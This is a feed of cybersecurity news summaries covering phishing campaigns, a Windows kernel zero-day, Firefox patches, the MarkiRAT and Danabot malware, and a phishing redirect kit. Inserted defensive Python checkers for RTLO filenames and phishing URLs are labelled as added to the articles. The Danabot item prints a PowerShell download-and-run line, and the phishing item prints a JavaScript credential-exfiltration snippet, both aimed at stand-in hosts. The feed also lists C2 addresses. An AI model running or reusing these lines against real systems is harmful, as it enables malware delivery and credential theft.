• A Russian-speaking threat actor has orchestrated an extensive phishing campaign that has registered over 4,300 malicious domains targeting travelers since the beginning of 2025. The sophisticated operation customizes phishing pages to impersonate legitimate travel industry giants including Airbnb, Booking.com, Expedia, and Agoda, deceiving unsuspecting users into surrendering payment card information under the guise of hotel […]

    The post Phishing Attack Impersonates Travel Brands Using 4,300 Malicious Domains appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Microsoft has disclosed a critical Windows Kernel vulnerability that is currently under active exploitation in the wild. Tracked as CVE-2025-62215, the flaw enables attackers to escalate privileges and gain elevated access on vulnerable Windows systems.

    Attribute | Details
    CVE ID | CVE-2025-62215
    Type | Elevation of Privilege
    Release Date | November 11, 2025
    Severity | Important
    CVSS Score | 7.0 (6.5 […]

    The post Windows Kernel 0-Day Under Active Exploitation for Privilege Escalation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Ferocious Kitten has emerged as a significant cyber-espionage threat targeting Persian-speaking individuals within Iran since at least 2015.

    The Iranian-linked advanced persistent threat group operates with a highly focused objective, utilizing politically themed decoy documents to manipulate victims into executing weaponized files.

    Over the years, the group developed a sophisticated custom implant known as MarkiRAT, which provides extensive data collection capabilities including keystroke logging, clipboard data capture, screenshot functionality, and credential harvesting with staged data exfiltration through HTTP and HTTPS protocols.

    The group’s attack methodology relies on spearphishing campaigns delivering malicious Microsoft Office documents embedded with Visual Basic for Applications macros.

    These crafted emails target dissidents, activists, and individuals perceived as threats to the Iranian regime. Once a victim opens a weaponized document, the embedded macros execute with user-level privileges, establishing a system foothold.

    The social engineering proves remarkably effective, as the bait documents contain anti-regime propaganda that reinforces their perceived legitimacy with the intended targets.

    Following initial execution, the malware deploys multiple persistence mechanisms.

    Picus Security’s analysts found that MarkiRAT variants use hijacking techniques that implant the malware alongside legitimate applications.

    Certain variants search for Telegram or Chrome installations, copy themselves into application directories, and modify shortcuts to execute the malware before launching the legitimate application.

    This technique remains effective because, from the user’s point of view, the application still launches and functions normally after the malware has run.

    Defense Evasion and Collection Mechanisms

    The malware employs several evasion tactics to circumvent detection and security controls. One technique involves the Right-to-Left Override (RTLO) Unicode trick, which manipulates filename display within file explorers.

    By inserting the Unicode character U+202E into executable filenames, attackers make malicious files appear as harmless media files such as images or videos.

    A file named “MyVideo\u202E4pm.exe” displays as “MyVideoexe.mp4” to users, dramatically increasing execution probability among non-technical victims.
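One way to surface this trick on the defender side, as an added example that is not part of the original article: a small Python check that flags bidi control characters in attachment names, approximates how a bidi-naive explorer would display the name, and compares the displayed extension with the real one. The executable-extension list and the rendering model (text after U+202E shown reversed until U+202C or the end of the name) are assumptions.

```python
from pathlib import PurePath

# Unicode bidi override/embedding/isolate controls: they change how a name is
# displayed without changing the bytes the OS uses to open the file.
BIDI_CONTROLS = {"\u202A", "\u202B", "\u202C", "\u202D", "\u202E",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
# Extensions Windows runs directly (assumed list); a file whose real extension is
# one of these but whose displayed name ends in a media extension is the RTLO lure.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".js", ".vbs",
                   ".lnk", ".msi", ".ps1", ".hta"}

def displayed_name(name: str) -> str:
    """Approximate how a bidi-naive file explorer renders the name: characters
    after an RLO (U+202E) are shown reversed until a PDF (U+202C) or the end of
    the string; other control characters are simply invisible."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202E":
            end = name.find("\u202C", i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        else:
            if ch not in BIDI_CONTROLS:
                out.append(ch)
            i += 1
    return "".join(out)

def analyze_filename(name: str) -> dict:
    """Flag bidi controls and report the real vs. displayed extension."""
    controls = sorted({f"U+{ord(c):04X}" for c in name if c in BIDI_CONTROLS})
    shown = displayed_name(name)
    true_ext = PurePath(name).suffix.lower()
    shown_ext = PurePath(shown).suffix.lower()
    return {
        "name": name,
        "bidi_controls": controls,
        "displayed_as": shown,
        "true_extension": true_ext,
        "displayed_extension": shown_ext,
        "suspicious": bool(controls),      # any override character is worth a look
        # strongest signal: the OS will execute it while the user sees a media file
        "extension_mismatch": bool(controls) and true_ext in EXECUTABLE_EXTS
                              and shown_ext != true_ext,
    }

def flag_attachments(names) -> list:
    """Entries from a mail or share listing that carry bidi override characters."""
    return [r for r in map(analyze_filename, names) if r["suspicious"]]
```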

    MarkiRAT’s collection capabilities represent its core functionality. The implant maintains persistent beaconing threads communicating with command-and-control servers using HTTP POST and GET requests.

    The malware systematically records user keystrokes and clipboard contents, then exfiltrates this intelligence to remote servers.

    Critically, Picus Security researchers noted that MarkiRAT targets specific credential storage formats including KeePass databases (.kdbx) and PGP key files (.gpg).

    The malware terminates KeePass processes before keystroke logging begins, forcing users to re-enter master passwords, thereby capturing authentication credentials.

    The group demonstrates adaptive operational security by checking for installed security software such as Kaspersky and Bitdefender.

    Ferocious Kitten’s collection-focused methodology and sustained targeting reveal an organization prioritizing intelligence gathering, establishing this group as a persistent and evolving threat to Persian-speaking populations globally.

    The post Ferocious Kitten APT Deploying MarkiRAT to Capture Keystroke and Clipboard Logging appeared first on Cyber Security News.

  • The Mozilla Foundation released three critical security advisories on November 11, 2025, addressing 16 unique vulnerabilities across multiple Firefox versions and platforms. The updates target Firefox 145, Firefox ESR 115.30, and Firefox ESR 140.5, with 12 vulnerabilities rated High impact and an additional 14 rated Moderate, affecting millions of users worldwide.

    CVE ID | Product | Vulnerability Type | Severity
    CVE-2025-13012 […]

    The post Mozilla Issues Urgent Firefox Update to Patch Critical Code Execution Flaws appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A landmark Metropolitan Police investigation has concluded with the sentencing of two individuals involved in one of the world’s largest cryptocurrency seizures, which recovered over 61,000 Bitcoin, worth approximately £5 billion, from a sophisticated international fraud operation. A seven-year investigation by the Metropolitan Police’s Economic Crime team has reached a significant milestone, with Zhimin Qian, […]

    The post Chinese National Sentenced for Laundering Over £5 Billion from 128,000 Victims appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A sophisticated phishing campaign is targeting Microsoft 365 users worldwide through a newly discovered tool called Quantum Route Redirect.

    This advanced automation platform transforms complex phishing operations into simple one-click attacks that evade traditional security measures.

    The campaign has already affected victims across 90 countries, with the United States accounting for 76% of the targets.

    The tool represents a dangerous shift in the phishing landscape by removing technical barriers that once limited cybercriminal activities. What previously required advanced expertise can now be executed by less experienced attackers using this pre-configured phishing kit.

    The platform comes with ready-made phishing domains and automated systems that handle everything from traffic routing to victim tracking.

    KnowBe4 Threat Lab security researchers first identified attacks using Quantum Route Redirect in early August 2025 through their PhishER Plus and Defend platforms.

    The research team has since uncovered approximately 1,000 domains currently hosting this tool. The campaigns employ diverse social engineering tactics including DocuSign impersonation, payroll notifications, payment alerts, and QR code phishing to maximize victim engagement.

    Quantum Route Redirect system flow (Source: KnowBe4)

    The attack infrastructure demonstrates concerning longevity potential, with developers planning upgrades that include QR code generation capabilities.

    Victims receive phishing emails containing links that follow a consistent pattern: /([\w\d-]+\.){2}[\w]{,3}\/quantum.php/ hosted on parked or compromised legitimate domains.

    This strategic choice leverages brand trust to increase success rates.
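To show where this pattern can be used defensively, an added example (not code from KnowBe4 or the original post): a Python check that walks the text parts of a constructed MIME message and matches every absolute URL against a cleaned-up form of the pattern above. It loosens the TLD length to two or more letters, an assumption; the sample message and its domains are constructed.

```python
import re
from email import message_from_string

# Cleaned-up form of the kit's URL pattern: a multi-label hostname followed by
# /quantum.php. The reported pattern caps the TLD at three characters; this
# version (an assumption) accepts any TLD of two or more letters.
QUANTUM_URL = re.compile(
    r"https?://(?:[\w-]+\.)+[a-z]{2,}(?::\d+)?/quantum\.php(?:\?[^\s\"'<>]*)?", re.I)
# Generic absolute-URL matcher; it stops at quotes, so href="..." values are caught too.
ANY_URL = re.compile(r"https?://[^\s\"'<>]+", re.I)

def extract_urls(raw_email: str) -> list:
    """Every absolute URL in the text/plain and text/html parts of a message."""
    urls = []
    for part in message_from_string(raw_email).walk():
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue   # skip multipart containers and non-text attachments
        body = part.get_payload(decode=True).decode(
            part.get_content_charset() or "utf-8", "replace")
        urls.extend(m.group(0) for m in ANY_URL.finditer(body))
    return urls

def find_quantum_urls(raw_email: str) -> list:
    """De-duplicated URLs matching the quantum.php redirect pattern, in order found."""
    hits = []
    for url in extract_urls(raw_email):
        if QUANTUM_URL.match(url) and url not in hits:
            hits.append(url)
    return hits

# Constructed sample message (not from a real campaign) with a lure in each part.
SAMPLE_EMAIL = """\
From: "Payroll" <hr@example.com>
Subject: Action required: updated payroll statement
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Review your statement: http://docs.parked-example.net/quantum.php?id=7
--b1
Content-Type: text/html; charset="utf-8"

<html><body><a href="https://www.parked-example.com/quantum.php">View</a>
<a href="https://www.example.com/help">Help</a></body></html>
--b1--
"""
```

Because the kit sends scanners to a benign site, a sandbox verdict on the link is unreliable; matching the URL shape at the gateway does not depend on what the redirector chooses to serve.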

    Intelligent Traffic Routing System

    The core innovation behind Quantum Route Redirect lies in its sophisticated visitor classification system.

    When someone clicks a malicious link, the platform immediately analyzes incoming traffic to differentiate between automated security scanners and human targets through real-time behavioral analysis.

    The system routes security tools and bots to legitimate websites, making the original email appear harmless during automated URL scanning.

    Meanwhile, genuine human visitors are directed straight to credential harvesting pages. This automated evasion technique successfully deceives both email security gateways and web application firewalls.

    The platform performs browser fingerprinting and VPN/proxy detection automatically, enhancing its ability to identify security tools versus actual targets.

    Cybercriminals monitor campaign effectiveness through an intuitive dashboard displaying comprehensive analytics including total impressions, victim locations, device types, and browser information.

    This management interface provides two key components: a configuration panel for managing redirect rules and routing logic, plus visitor statistics for tracking traffic data and measuring campaign success rates.

    The post New Quantum Route Redirect Tool Lets Attackers Launch One-Click Phishing Attacks on Microsoft 365 Users appeared first on Cyber Security News.

  • Danabot, a notorious banking Trojan, has made a significant comeback with its new version 669 after a period of inactivity triggered by Operation Endgame’s law enforcement sweep in May 2025.

    This advanced malware’s resurgence signals a new threat wave targeting financial institutions, cryptocurrency users, and individual victims using sophisticated multi-stage attacks.

    Danabot carries a legacy of credential theft, financial fraud, and information exfiltration; its latest evolution marks a technical refinement in both behavioral tactics and infrastructure.

    The malware leverages multiple attack vectors to infect systems, including spear-phishing campaigns and malicious documents designed to deliver its payload.

    Victims are lured into executing obfuscated attachments using convincing social engineering, which triggers the initial infection.

    Once established, Danabot version 669 deploys several modules specializing in data harvesting, lateral movement across networks, and payload delivery tailored for Windows environments.

    The malware also targets cryptocurrency wallets, amplifying its reach beyond traditional banking fraud.

    Security researchers from Zscaler ThreatLabz identified and analyzed version 669, confirming its revival and exposing its technical underpinnings.

    Notably, ThreatLabz documented shifts in Danabot’s command-and-control (C2) infrastructure.

    The malware now employs a mix of conventional IP-based C2s and .onion addresses to manage payloads and data exfiltration, ensuring operational resilience and complicating mitigation efforts.

    Key C2 addresses include 62.60.226[.]146:443, 62.60.226[.]154:443, and several .onion domains such as aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwItbcysuybirygxzvp23ad[.]onion:44.

    Infection Mechanism Spotlight

    At the core of Danabot’s infection process is a robust loader. Once executed, this loader downloads additional encrypted modules and configuration files from multiple C2 servers. The following code snippet represents the initial stage payload deployment:

    # Fetches the next-stage payload from the C2 into a world-writable path, then runs it
    Invoke-WebRequest -Uri 'http://malicious-server/payload' -OutFile 'C:\Users\Public\payload.exe'; Start-Process 'C:\Users\Public\payload.exe'

    After establishing a foothold, Danabot injects itself into legitimate Windows processes as a persistence measure and leverages scheduled tasks for continual execution.

    The modular design allows the threat actor to remotely manage new payloads and update infection parameters without direct user interaction.

    This strategic flexibility, coupled with enhanced detection evasion through encrypted configuration and C2 communications, makes Danabot version 669 a formidable adversary in the current threat landscape.

    The post Danabot Malware Resurfaced with Version 669 Following Operation Endgame appeared first on Cyber Security News.

  • Microsoft has assigned CVE-2025-62215 to a new Windows Kernel elevation of privilege flaw that is being actively exploited in the wild.

    Published on November 11, 2025, the vulnerability is rated Important and tracked as an elevation of privilege issue in the kernel. Microsoft’s exploitability index lists “Exploitation Detected,” indicating real-world use despite the absence of public disclosure.

    CVE-2025-62215 stems from concurrent execution using a shared resource with improper synchronization, aligning with CWE-362 (race condition), and is also associated with CWE-415 (double free).

    Successful exploitation requires an attacker to win a race condition (CVSS Attack Complexity: High), but when it lands, it can grant SYSTEM privileges.

    The flaw is local and requires an already authorized attacker, making it a classic post-compromise privilege escalation used to deepen control, disable defenses, and move laterally.

    While technical specifics remain limited, the combination of race condition and double free suggests a timing-sensitive memory corruption path in kernel code.

    This profile is consistent with techniques favored by both targeted threat actors and ransomware operators to elevate privileges after initial access via phishing, driver abuse, or application exploits.

    Windows Version | Affected | Fixed KB Number | Release Date | Notes
    Windows 10 (various builds, including ESU) | Yes | KB5068858 (example for 22H2) | November 12, 2025 | All supported editions affected; ESU required for post-support patching.
    Windows 11 version 22H2 | Yes | KB5068865 | November 12, 2025 | Core kernel component; immediate patching recommended.
    Windows 11 version 23H2 | Yes | KB5068862 | November 12, 2025 | Includes security and quality fixes addressing the race condition.
    Windows 11 version 24H2 | Yes | KB5068861 | November 12, 2025 | Latest feature update; exploitation detected pre-patch.
    Windows Server 2019 | Yes | KB5068859 | November 12, 2025 | Server environments at higher risk due to privilege escalation potential.
    Windows Server 2022 | Yes | KB5068860 | November 12, 2025 | Applies to domain controllers and file servers; monitor for updates.
    Windows Server 2025 | Yes | KB5068861 | November 12, 2025 | New server OS; aligns with Windows 11 24H2 patching.

    Given that exploitation has been detected but no public proof-of-concept is available, expect continued targeted use.

    Organizations should treat CVE-2025-62215 as a priority for rapid patching and detection engineering, with special attention to servers, jump hosts, and administrative workstations.

    The post Windows Kernel 0‑day Vulnerability Actively Exploited in the Wild to Escalate Privilege appeared first on Cyber Security News.

  • A new wave of security alert-themed phishing emails has recently surfaced, causing concern within both enterprise and personal email environments.

    These malicious emails cleverly impersonate official security notifications, often appearing to come from the victim’s own domain.

    Their main objective is to instill panic by warning users about “blocked messages” and to prompt recipients into urgent action, such as clicking a provided link to resolve the issue.

    This campaign demonstrates how perpetrators can skillfully exploit trust and urgency, increasing the likelihood that unsuspecting users will interact with harmful links.

    In these campaigns, recipients are misled into believing their inbox is at risk. Upon clicking the disguised link, victims are redirected to a fake webmail login portal that’s designed to closely mirror legitimate pages.

    Significantly, the portal is pre-filled with the recipient’s actual email address, adding to its authenticity.

    Unit 42 security analysts noted this campaign’s effectiveness in bypassing basic suspicion by imitating legitimate internal warnings.

    Their research identified that attackers deploy these phishing kits to harvest user credentials efficiently while maintaining a convincing facade.

    Malicious Emails

    Here the phishing email mimics genuine security alerts with deceptive subject lines and sender information.

    Delving into the infection chain, the attack leverages HTML email attachments, which often contain embedded JavaScript.

    Upon opening the attachment, malicious scripts execute in the recipient’s browser, capturing login details entered on the spoofed page.

    A code snippet observed in these campaigns typically resembles:

    // read whatever the victim typed into the spoofed login form
    let creds = { email: document.getElementById('email').value, pass: document.getElementById('pass').value };
    // post it to the attacker-controlled collection endpoint
    fetch('https://malicious.site/collect', { method: 'POST', body: JSON.stringify(creds) });

    This script silently collects credentials and transmits them to an attacker-controlled server.

    The threat from such phishing operations lies in both technical sophistication and psychological manipulation, making layered defenses and user vigilance critical for mitigation.

    The post Beware of Security Alert-Themed Malicious Emails that Steal Your Email Logins appeared first on Cyber Security News.

  • Microsoft has released its November 2025 Patch Tuesday update, addressing 63 security vulnerabilities across its software lineup. The update includes a critical fix for a zero-day vulnerability in the Windows Kernel that is confirmed to be actively exploited in the wild. The most critical patch in this month’s release is for CVE-2025-62215, an Elevation of […]

    The post Microsoft Patch Tuesday for November 2025 – Fix for 0-day and Other 62 Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
